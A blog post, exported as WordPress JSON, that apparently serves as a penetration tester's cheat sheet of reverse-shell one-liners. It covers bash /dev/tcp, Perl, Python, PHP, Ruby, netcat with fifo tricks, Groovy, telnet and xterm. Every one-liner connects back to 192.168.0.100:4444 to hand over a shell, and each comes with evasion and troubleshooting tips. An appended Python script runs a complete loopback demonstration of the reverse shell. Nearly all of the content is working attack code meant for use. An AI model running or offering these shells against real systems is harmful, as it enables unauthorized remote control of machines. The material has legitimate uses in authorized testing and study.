{"id":380,"date":"2012-02-05T22:07:32","date_gmt":"2012-02-05T21:07:32","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=380"},"modified":"2012-02-05T22:07:32","modified_gmt":"2012-02-05T21:07:32","slug":"reverse-shell-cheat-sheet","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/02\/05\/reverse-shell-cheat-sheet\/","title":{"rendered":"Reverse Shell Cheat Sheet"},"content":{"rendered":"<p>There are many pages on the web documenting quick reverse shell one-liners. <a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet\" target=\"_blank\">Pentestmonkey<\/a> and <a href=\"http:\/\/bernardodamele.blogspot.com\/2011\/09\/reverse-shells-one-liners.html\" target=\"_blank\">Bernardo Damele<\/a> have both created a good few posts between them, but I wanted to recapture what they&#8217;ve got for my own notes (it&#8217;s easier for me to find stuff if it&#8217;s in one place). All credit goes to both of those guys, as that is where all of this info came from.<\/p>\n
<p><strong>Step one<\/strong> &#8211; Set up your listener.<\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">nc <span class=\"re5\">-l<\/span> <span class=\"re5\">-v<\/span> attackerip <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>That form is for the OpenBSD netcat; the traditional netcat wants the port behind -p (nc -l -v -p 4444). Either way, check the listener is really bound before you fire the payload (netstat -ltn or ss -ltn) and make sure the port is reachable from the victim through whatever sits in between. In all these examples the attacker IP will be 192.168.0.100 and the listener port 4444.<\/p>\n
<p><strong>Bash<\/strong><\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw3\">exec<\/span> <span class=\"nu0\">5<\/span><span class=\"sy0\">&lt;&gt;\/<\/span>dev<span class=\"sy0\">\/<\/span>tcp<span class=\"sy0\">\/<\/span>192.168.0.100<span class=\"sy0\">\/<\/span><span class=\"nu0\">4444<\/span><br \/>\n
<span class=\"kw2\">cat<\/span> <span class=\"sy0\">&lt;&amp;<\/span><span class=\"nu0\">5<\/span> <span class=\"sy0\">|<\/span> <span class=\"kw1\">while<\/span> <span class=\"kw2\">read<\/span> line; <span class=\"kw1\">do<\/span> <span class=\"re1\">$line<\/span> <span class=\"nu0\">2<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">5<\/span> <span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">5<\/span>; <span class=\"kw1\">done<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"nu0\">0<\/span><span class=\"sy0\">&lt;&amp;<\/span><span class=\"nu0\">196<\/span>;<span class=\"kw3\">exec<\/span> <span class=\"nu0\">196<\/span><span class=\"sy0\">&lt;&gt;\/<\/span>dev<span class=\"sy0\">\/<\/span>tcp<span class=\"sy0\">\/<\/span>192.168.0.100<span class=\"sy0\">\/<\/span><span class=\"nu0\">4444<\/span>; <span class=\"kw2\">sh<\/span> <span class=\"sy0\">&lt;&amp;<\/span><span class=\"nu0\">196<\/span> <span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">196<\/span> <span class=\"nu0\">2<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">196<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">bash<\/span> <span class=\"re5\">-i<\/span> <span class=\"sy0\">&gt;&amp;<\/span> <span class=\"sy0\">\/<\/span>dev<span class=\"sy0\">\/<\/span>tcp<span class=\"sy0\">\/<\/span>192.168.0.100<span class=\"sy0\">\/<\/span><span class=\"nu0\">4444<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>\/dev\/tcp is a bash feature, not a real device file, so these three only work when the command is actually run by bash (not by \/bin\/sh on a Debian-style system, where that is dash).<\/p>\n
<p><strong>Perl<\/strong><\/p>\n
<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">perl <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'use Socket;$i=&quot;192.168.0.100&quot;;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>Note the capital S in use Socket; Perl module names are case sensitive and use socket fails on Linux.<\/p>\n
<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">perl <span class=\"sy0\">-<\/span>MIO <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;192.168.0.100:4444&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>For Windows-based systems use the same without the fork:<\/p>\n
<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">perl <span class=\"sy0\">-<\/span>MIO <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'$c=new IO::Socket::INET(PeerAddr,&quot;192.168.0.100:4444&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p><strong>Python<\/strong><\/p>\n
<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"python codecolorer\">python -c <span class=\"st0\">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.0.100&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>The three dup2 calls point stdin, stdout and stderr at the socket before the shell is started, so the shell itself never knows it is talking to the network. The same code runs unchanged under python3.<\/p>\n
<p><strong>PHP<\/strong><\/p>\n
<div class=\"codecolorer-container php vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"php codecolorer\">php <span class=\"sy0\">-<\/span>r <span class=\"st_h\">'$sock=fsockopen(&quot;192.168.0.100&quot;,4444);exec(&quot;\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>This assumes the socket lands on file descriptor 3, the first free one after stdin, stdout and stderr. If the PHP process already has other descriptors open the number will differ, so try 4, 5 or 6 if nothing comes back.<\/p>\n
<p><strong>Ruby<\/strong><\/p>\n
<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">ruby <span class=\"sy0\">-<\/span>rsocket <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'f=TCPSocket.open(&quot;192.168.0.100&quot;,4444).to_i;exec sprintf(&quot;\/bin\/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>The following does not need \/bin\/sh:<\/p>\n
<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">ruby <span class=\"sy0\">-<\/span>rsocket <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'exit if fork;c=TCPSocket.new(&quot;192.168.0.100&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>The following is for Windows-based systems (the same without the fork):<\/p>\n
<div class=\"codecolorer-container perl vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"perl codecolorer\">ruby <span class=\"sy0\">-<\/span>rsocket <span class=\"sy0\">-<\/span>e <span class=\"st_h\">'c=TCPSocket.new(&quot;192.168.0.100&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p><strong>NetCat<\/strong><\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">nc <span class=\"re5\">-e<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> 192.168.0.100 <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">nc <span class=\"re5\">-c<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> 192.168.0.100 <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> <span class=\"sy0\">|<\/span> nc 192.168.0.100 <span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>The last one is one-way: the shell&#8217;s output reaches the listener, but nothing you type at the listener reaches the shell, because sh is still reading its stdin from wherever it was launched. Treat it as a quick &#8220;can I get out?&#8221; test rather than a shell.<\/p>\n
<p>If the -e flag is disabled (the OpenBSD netcat build has no -e at all) you can get around it with a named pipe: nc moves the bytes, the fifo feeds what comes in to the shell, and the shell&#8217;s output goes back into nc.<\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">rm<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>f;<span class=\"kw2\">mkfifo<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>f;<span class=\"kw2\">cat<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>f<span class=\"sy0\">|\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> <span class=\"re5\">-i<\/span> <span class=\"nu0\">2<\/span><span class=\"sy0\">&gt;&amp;<\/span><span class=\"nu0\">1<\/span><span class=\"sy0\">|<\/span>nc 192.168.0.100 <span class=\"nu0\">4444<\/span> <span class=\"sy0\">&gt;\/<\/span>tmp<span class=\"sy0\">\/<\/span>f<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">rm<\/span> <span class=\"re5\">-f<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p; <span class=\"kw2\">mknod<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p p <span class=\"sy0\">&amp;&amp;<\/span> nc 192.168.0.100 <span class=\"nu0\">4444<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">&lt;\/<\/span>tmp<span class=\"sy0\">\/<\/span>p <span class=\"sy0\">|<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> <span class=\"nu0\">1<\/span><span class=\"sy0\">&gt;\/<\/span>tmp<span class=\"sy0\">\/<\/span>p<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>Both variants leave a fifo behind in \/tmp, so remove it when you are done.<\/p>\n
<p><strong>Java<\/strong><\/p>\n
<div class=\"codecolorer-container java vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"java codecolorer\">r <span class=\"sy0\">=<\/span> <span class=\"kw3\">Runtime<\/span>.<span class=\"me1\">getRuntime<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n
p <span class=\"sy0\">=<\/span> r.<span class=\"me1\">exec<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#91;<\/span><span class=\"st0\">&quot;\/bin\/bash&quot;<\/span>,<span class=\"st0\">&quot;-c&quot;<\/span>,<span class=\"st0\">&quot;exec 5&lt;&gt;\/dev\/tcp\/192.168.0.100\/4444;cat &lt;&amp;5 | while read line; do <span class=\"es0\">\\$<\/span>line 2&gt;&amp;5 &gt;&amp;5; done&quot;<\/span><span class=\"br0\">&#93;<\/span> as <span class=\"kw3\">String<\/span><span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n
p.<span class=\"me1\">waitFor<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>Strictly this is Groovy rather than plain Java (the list literal and the as String[] cast), which is what you want in a Groovy script console; it simply hands the first Bash one-liner above to \/bin\/bash -c, so it needs bash on the target.<\/p>\n
<p><strong>Telnet<\/strong><br \/>\n
If netcat is missing (and in most cases you won&#8217;t have it), then use telnet:<\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">rm<\/span> <span class=\"re5\">-f<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p; <span class=\"kw2\">mknod<\/span> <span class=\"sy0\">\/<\/span>tmp<span class=\"sy0\">\/<\/span>p p <span class=\"sy0\">&amp;&amp;<\/span> telnet 192.168.0.100 <span class=\"nu0\">4444<\/span> <span class=\"nu0\">0<\/span><span class=\"sy0\">&lt;\/<\/span>tmp<span class=\"sy0\">\/<\/span>p <span class=\"sy0\">|<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">sh<\/span> <span class=\"nu0\">1<\/span><span class=\"sy0\">&gt;\/<\/span>tmp<span class=\"sy0\">\/<\/span>p<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"bash codecolorer\">telnet 192.168.0.100 <span class=\"nu0\">4444<\/span> <span class=\"sy0\">|<\/span> <span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">bash<\/span> <span class=\"sy0\">|<\/span> telnet 192.168.0.100 <span class=\"nu0\">4445<\/span><br \/>\n
<span class=\"co0\"># also listen on your machine on port 4445\/tcp: you type into the 4444 listener and the output comes back on the 4445 one<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p><strong>Xterm<\/strong><br \/>\n
This one is a little more tricky. The listener on the attacker box is an X server, because the victim is going to open an xterm on your display. Display :1 listens on TCP port 6001, so that port has to be reachable from the victim (and if your X server build defaults to not listening on TCP, check whether it needs to be started with -listen tcp). Start it with Xnest and open an xterm on it:<\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">Xnest :<span class=\"nu0\">1<\/span> <span class=\"sy0\">&amp;<\/span> <span class=\"kw2\">sleep<\/span> <span class=\"nu0\">2<\/span>; xterm <span class=\"re5\">-display<\/span> 127.0.0.1:<span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>and then inside the spawned xterm session allow the victim (and only the victim; a bare xhost + lets anyone on the network at your display) to connect:<\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">xhost<\/span> +victimip<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
<p>Then on the victim run this, and the xterm should appear inside your Xnest window:<\/p>\n
<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">xterm <span class=\"re5\">-display<\/span> 192.168.0.100:<span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n
","protected":false},"excerpt":{"rendered":"<p>There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they&#8217;ve got for my notes purposes. (It&#8217;s easier for me to find stuff if it&#8217;s in one place). All credit goes to both [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,4,1],"tags":[144,142,143,140,141],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/380"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=380"}],"version-history":[{"count":11,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/380\/revisions"}],"predecessor-version":[{"id":391,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/380\/revisions\/391"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\
/wp\/v2\/categories?post=380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
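Worked example for the "Step one" listener and the Python one-liner in the post above. This is an added example, not code from the original page or from Pentestmonkey or Bernardo Damele: it plays both sides on 127.0.0.1, with the parent process standing in for nc -l -v and a forked child doing exactly what the python -c one-liner does (connect, dup2 the socket over fds 0, 1 and 2, exec /bin/sh), so you can watch commands go out and output come back. It assumes a POSIX host with /bin/sh; the port is chosen by the kernel. The -i is dropped on purpose, since an interactive shell would try to prompt on a socket that is not a tty.

```python
import os
import socket

# Added example (not from the original post): a stand-in for "nc -l -v" plus
# the page's dup2 reverse shell, wired together over loopback so the whole
# round trip can be observed. Assumed: POSIX host with /bin/sh.


def catch_reverse_shell(commands, host="127.0.0.1"):
    """Listen on an ephemeral port, spawn a reverse shell that calls back to it,
    feed it `commands` one per line and return everything the shell sent back
    (stdout and stderr mixed, exactly as the listener would see them)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, 0))               # port 0: kernel picks a free port
    port = listener.getsockname()[1]
    listener.listen(1)

    pid = os.fork()
    if pid == 0:
        # Child plays the victim. This is the page's python one-liner minus -i.
        try:
            listener.close()
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            for fd in (0, 1, 2):           # stdin, stdout, stderr -> the socket
                os.dup2(s.fileno(), fd)
            os.execv("/bin/sh", ["/bin/sh"])
        finally:
            os._exit(1)                    # only reached if connect/exec failed

    # Parent plays the attacker's listener.
    conn, _peer = listener.accept()
    listener.close()
    script = "".join(cmd + "\n" for cmd in commands) + "exit\n"
    conn.sendall(script.encode())
    conn.shutdown(socket.SHUT_WR)          # nothing more to type; sh sees EOF
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    os.waitpid(pid, 0)                     # reap the shell
    return b"".join(chunks).decode(errors="replace")


def shell_answers(commands):
    """The shell's reply as a list of lines; stderr is folded in because the
    one-liner points fd 2 at the same socket as fd 1."""
    return catch_reverse_shell(commands).splitlines()


if __name__ == "__main__":
    for line in shell_answers(["echo reverse-shell-ok", "id", "echo via-stderr 1>&2"]):
        print(line)
```

Because all three descriptors are the socket, error output arrives on the listener interleaved with normal output, which is why the `2>&5`, `2>&1` and `2>&3` redirections appear in every one-liner on the page.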